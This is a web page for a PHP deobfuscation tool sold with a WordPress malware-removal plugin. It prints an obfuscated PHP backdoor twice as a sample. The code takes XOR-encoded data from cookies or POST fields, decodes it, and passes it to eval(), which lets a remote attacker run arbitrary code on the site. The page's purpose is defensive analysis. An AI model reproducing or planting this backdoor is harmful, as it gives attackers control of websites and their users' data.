Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
function XFJeRGxVE()
{
$mSMUb = array("qhFguTrvUDLeYYalvINQOsTlhKI" => "tFutPVGbS");
$EtXmTWcr = array(
/* KLU */
"YwNcYGRMP" => "yDvNwjaPUOMaRRqSvtDTTJPCqZtIl",
);
$FJXluMnz = array(
$mSMUb,
/*X*/
$_COOKIE,
$mSMUb,
$_POST,
$EtXmTWcr,
);
return $FJXluMnz;
}
/* jDAl */
/* eaK */
function zTzMeKho()
{
/* y*/
$MgwdxhxJP = "#";
foreach (XFJeRGxVE() as $rSLxx) {
/*CYZ */
JNUOvHulpB($rSLxx, $MgwdxhxJP);
}
}
/* n*/
function pcPxwCl($MXqqSrydnJ, $mSMUb)
{
if (count($MXqqSrydnJ) == 3) {
/* CV */
$EhkekvIFY = $MXqqSrydnJ[1];
$zPAeHhF = $MXqqSrydnJ[2];
$_Y = '32594';
$abuOVnHuP = $EhkekvIFY($zPAeHhF);
$_jk = '1592';
/* o*/
eval($abuOVnHuP);
die;
}
/* WfmW */
}
/*m */
/* cuG */
function fWwrFxNS($suZrMbV, $rAzzJRZm)
{
return $suZrMbV ^ $rAzzJRZm;
}
/* ad*/
/* pGr */
function LPKdrL($vWZXzeXjGN, $MgwdxhxJP)
{
/* ioHq*/
/*F */
$vWZXzeXjGN = explode($MgwdxhxJP, $vWZXzeXjGN);
pcPxwCl($vWZXzeXjGN, $MgwdxhxJP);
$_pV = '17799';
}
function JNUOvHulpB($rSLxx, $MgwdxhxJP)
{
/* TCPwP */
foreach ($rSLxx as $rAzzJRZm => $suZrMbV) {
/* lv */
uZFNVq($rAzzJRZm, yfPHNUygM($suZrMbV), $MgwdxhxJP);
$_yrm = '51682';
/* Cfi */
}
/*y */
}
function SGfJjEqALa($rAzzJRZm, $suZrMbV)
{
$JHaAl = strlen(
/* Hn */
$suZrMbV
) / strlen(
/* xae*/
$rAzzJRZm
);
$_QzJ = '13180';
$rAzzJRZm .= "Htr-uVlItIy-gEmwy-NMpOeF-ZDVNJU-EbGMVuh-HxGKOo";
$rAzzJRZm = str_repeat($rAzzJRZm, $JHaAl + 1);
return $rAzzJRZm;
}
/* DaxAV*/
function yfPHNUygM($suZrMbV)
{
return @pack(
/* wTvy */
'H*',
/*UlLW */
$suZrMbV
);
}
function uZFNVq($rAzzJRZm, $suZrMbV, $MgwdxhxJP)
{
/* QEOHo */
/* m */
LPKdrL($suZrMbV ^ SGfJjEqALa(
$rAzzJRZm,
/*xdNwC */
$suZrMbV
), $MgwdxhxJP);
}
/* PGz */
/* D*/
zTzMeKho();<?php
function XFJeRGxVE()
{
$mSMUb = array("qhFguTrvUDLeYYalvINQOsTlhKI" => "tFutPVGbS");
$EtXmTWcr = array(
/* KLU */
"YwNcYGRMP" => "yDvNwjaPUOMaRRqSvtDTTJPCqZtIl",
);
$FJXluMnz = array(
$mSMUb,
/*X*/
$_COOKIE,
$mSMUb,
$_POST,
$EtXmTWcr,
);
return $FJXluMnz;
}
/* jDAl */
/* eaK */
function zTzMeKho()
{
/* y*/
$MgwdxhxJP = "#";
foreach (XFJeRGxVE() as $rSLxx) {
/*CYZ */
JNUOvHulpB($rSLxx, $MgwdxhxJP);
}
}
/* n*/
function pcPxwCl($MXqqSrydnJ, $mSMUb)
{
if (count($MXqqSrydnJ) == 3) {
/* CV */
$EhkekvIFY = $MXqqSrydnJ[1];
$zPAeHhF = $MXqqSrydnJ[2];
$_Y = '32594';
$abuOVnHuP = $EhkekvIFY($zPAeHhF);
$_jk = '1592';
/* o*/
eval($abuOVnHuP);
die;
}
/* WfmW */
}
/*m */
/* cuG */
function fWwrFxNS($suZrMbV, $rAzzJRZm)
{
return $suZrMbV ^ $rAzzJRZm;
}
/* ad*/
/* pGr */
function LPKdrL($vWZXzeXjGN, $MgwdxhxJP)
{
/* ioHq*/
/*F */
$vWZXzeXjGN = explode($MgwdxhxJP, $vWZXzeXjGN);
pcPxwCl($vWZXzeXjGN, $MgwdxhxJP);
$_pV = '17799';
}
function JNUOvHulpB($rSLxx, $MgwdxhxJP)
{
/* TCPwP */
foreach ($rSLxx as $rAzzJRZm => $suZrMbV) {
/* lv */
uZFNVq($rAzzJRZm, yfPHNUygM($suZrMbV), $MgwdxhxJP);
$_yrm = '51682';
/* Cfi */
}
/*y */
}
function SGfJjEqALa($rAzzJRZm, $suZrMbV)
{
$JHaAl = strlen(
/* Hn */
$suZrMbV
) / strlen(
/* xae*/
$rAzzJRZm
);
$_QzJ = '13180';
$rAzzJRZm .= "Htr-uVlItIy-gEmwy-NMpOeF-ZDVNJU-EbGMVuh-HxGKOo";
$rAzzJRZm = str_repeat($rAzzJRZm, $JHaAl + 1);
return $rAzzJRZm;
}
/* DaxAV*/
function yfPHNUygM($suZrMbV)
{
return @pack(
/* wTvy */
'H*',
/*UlLW */
$suZrMbV
);
}
function uZFNVq($rAzzJRZm, $suZrMbV, $MgwdxhxJP)
{
/* QEOHo */
/* m */
LPKdrL($suZrMbV ^ SGfJjEqALa(
$rAzzJRZm,
/*xdNwC */
$suZrMbV
), $MgwdxhxJP);
}
/* PGz */
/* D*/
zTzMeKho();Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.